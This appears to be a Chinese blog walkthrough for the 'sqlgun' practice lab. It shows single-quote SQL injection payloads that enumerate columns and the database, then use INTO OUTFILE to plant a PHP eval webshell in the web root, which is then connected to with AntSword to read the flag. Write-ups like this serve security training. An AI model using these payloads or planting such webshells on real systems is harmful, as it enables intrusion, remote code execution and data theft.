当前位置: 首页 > article >正文

sqlgun靶场通关攻略

尝试在URL中测试一下sql注入,但是禁止注入

那么在输入框中测试一下xss,存在xss,那么极有可能如果存在sql注入在这里

在测试时,出现了这个搜索框的源代码,可以看出是单引号包含,所以可以测试闭合方式为单引号的sql注入

经测试,确实训在sql注入,闭合方式就是单引号

那么接下来测试回显点,得到2,3两个回显点

-1' union select 1,2,3#

爆数据库名,得到数据库名sqlgunnews

-1' union select 1,database(),3#

既然存在sql注入,那么我们可以尝试一下写入一句话木马进行测试

但是缺少绝对路径

我们对IP进行目录扫描一下看一下有什么可以用的

发现有一个phpinfo.php文件,访问一下

得到网站根目录/var/www/html

那接下来构造payload,将一句话木马写入根目录

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/zxin.php' #

访问zxin.php文件,我们的一句话木马就在进去了

 使用蚁剑谅连接一下,成功连接

 在根目录中可以找得到falg文件


http://www.kler.cn/a/313727.html

相关文章:

  • 大模型时代,呼叫中心部门如何自建一套大模型在线客服?
  • qt QVideoWidget详解
  • 第二节 OSI-物理层
  • 【机器学习】平均绝对误差(MAE:Mean Absolute Error)
  • C# 集合与泛型
  • 基于MATLAB+opencv人脸疲劳检测
  • 代码随想录算法训练营day39
  • 【C/C++语言系列】浅拷贝和深拷贝
  • php curl发送get、post请求
  • 等保测评:企业如何建立安全的开发环境
  • Opencv + Opencv_contrib的源码编译安装以及C++调用和cmakelist编写
  • 8.安卓逆向-安卓开发基础-安卓四大组件1
  • DataGrip在Windows和MacOS平台上的快捷键
  • 如何导入数据库时将ID也导入进去
  • 【推广】图书|2024新书《大模型RAG实战:RAG原理、应用与系统构建》汪鹏、谷清水、卞龙鹏等,机械工业出版社
  • 地平线占用预测 FlashOcc 参考算法-V1.0
  • 彩漩科技亮相企业出海峰会,展示智能办公新力量
  • 图解Redis 01 | 初识Redis
  • 网络爬虫Request静态页面数据获取
  • 有关shell指令练习2
  • Redis的持久化和高可用性
  • 深入探究HTTP网络协议栈:互联网通信的基石
  • es的封装
  • 如何为公司注册域名邮箱?
  • JVM四种垃圾回收算法以及G1垃圾回收器(面试)
  • 2024年9月python二级基本编程题和简单应用题解析(一)